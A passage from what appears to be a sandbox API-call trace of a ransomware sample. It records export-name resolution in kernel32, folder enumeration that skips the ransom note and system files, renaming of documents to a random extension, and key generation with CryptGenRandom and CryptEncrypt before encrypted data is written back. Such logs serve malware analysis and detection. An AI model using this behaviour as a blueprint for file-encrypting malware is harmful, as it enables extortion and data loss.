lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.871] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.871] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.871] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.871] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.871] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.871] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.871] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.871] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.871] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.871] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.871] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.871] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.871] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.871] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.871] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.871] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.871] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.871] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.872] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.872] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.872] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.872] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.872] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.872] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.872] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.872] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.872] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.872] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.872] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.872] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.872] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.873] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Txzpa.docx") returned 50 [0084.873] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Txzpa.docx.yB7xlL") returned 57 [0084.873] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Txzpa.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\txzpa.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Txzpa.docx.yB7xlL" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\txzpa.docx.yb7xll"), dwFlags=0x0) returned 1 [0084.873] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.874] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.874] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.874] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x623b87b0, ftCreationTime.dwHighDateTime=0x1d4ce49, ftLastAccessTime.dwLowDateTime=0x4546c50, ftLastAccessTime.dwHighDateTime=0x1d4cd01, ftLastWriteTime.dwLowDateTime=0x4546c50, ftLastWriteTime.dwHighDateTime=0x1d4cd01, nFileSizeHigh=0x0, nFileSizeLow=0x17dcd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vpMMF.odp", cAlternateFileName="")) returned 1 [0084.874] lstrcmpiW (lpString1="vpMMF.odp", lpString2="DECRYPT-FILES.txt") returned 1 [0084.874] lstrcmpiW (lpString1="vpMMF.odp", lpString2="autorun.inf") returned 1 [0084.874] lstrcmpiW (lpString1="vpMMF.odp", lpString2="boot.ini") returned 1 [0084.874] lstrcmpiW (lpString1="vpMMF.odp", lpString2="desktop.ini") returned 1 [0084.874] lstrcmpiW (lpString1="vpMMF.odp", lpString2="ntuser.dat") returned 1 [0084.874] lstrcmpiW (lpString1="vpMMF.odp", lpString2="iconcache.db") returned 1 [0084.874] lstrcmpiW (lpString1="vpMMF.odp", lpString2="bootsect.bak") returned 1 [0084.874] lstrcmpiW (lpString1="vpMMF.odp", lpString2="ntuser.dat.log") returned 1 [0084.874] lstrcmpiW (lpString1="vpMMF.odp", lpString2="thumbs.db") returned 1 [0084.874] lstrcmpiW (lpString1="vpMMF.odp", lpString2="Bootfont.bin") returned 1 [0084.874] lstrlenW (lpString="vpMMF.odp") returned 9 [0084.874] lstrcmpiW (lpString1="odp", lpString2="lnk") returned 1 [0084.874] lstrcmpiW (lpString1="odp", lpString2="exe") returned 1 [0084.874] lstrcmpiW (lpString1="odp", lpString2="sys") returned -1 [0084.875] lstrcmpiW (lpString1="odp", lpString2="dll") returned 1 [0084.875] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0084.875] lstrlenW (lpString="vpMMF.odp") returned 9 [0084.875] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0084.875] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="vpMMF.odp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpMMF.odp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpMMF.odp" [0084.875] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.875] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpMMF.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpmmf.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0084.875] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=97741) returned 1 [0084.875] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0084.875] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.875] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.875] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.875] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.876] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0084.876] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0084.878] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.878] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.879] CloseHandle (hObject=0x414) returned 1 [0084.879] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.879] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0084.880] CloseHandle (hObject=0x0) returned 0 [0084.880] CloseHandle (hObject=0x410) returned 1 [0084.880] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.880] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.881] GetTickCount () returned 0x114dae5 [0084.881] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.881] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.881] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.881] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.881] lstrlenA (lpString="kernel32.dll") returned 12 [0084.882] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.882] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.882] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.882] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.882] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.882] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.882] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.882] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.882] lstrlenA (lpString="ADDATOMA") returned 8 [0084.882] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.882] lstrlenA (lpString="ADDATOMW") returned 8 [0084.882] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.882] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.882] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.882] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.882] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.882] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.882] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.882] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.882] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.882] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.882] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.882] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.882] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.882] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.882] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.882] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.882] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.882] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.882] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.882] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.882] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.882] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.882] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.882] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.882] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.883] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.883] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.883] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.883] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.883] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.883] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.883] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.883] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.883] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.883] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.883] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.883] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.883] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.883] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.883] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.883] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.883] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.883] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.883] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.883] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.883] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.883] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.883] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.883] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.883] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.883] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.883] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.883] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.883] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.883] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.883] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.883] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.883] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.883] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.883] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.883] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.883] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.884] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.884] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.884] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.884] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.884] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.884] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.884] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.884] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.884] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.884] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.884] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.884] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.884] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.884] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.884] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.884] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.884] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.884] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.884] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.884] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.884] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.884] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.884] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.884] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.884] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.884] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.884] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.884] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.884] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.884] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.884] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.884] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.884] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.884] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.884] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.884] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.884] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.885] lstrlenA (lpString="BEEP") returned 4 [0084.885] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.885] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.885] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.885] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.885] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.885] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.885] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.885] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.885] 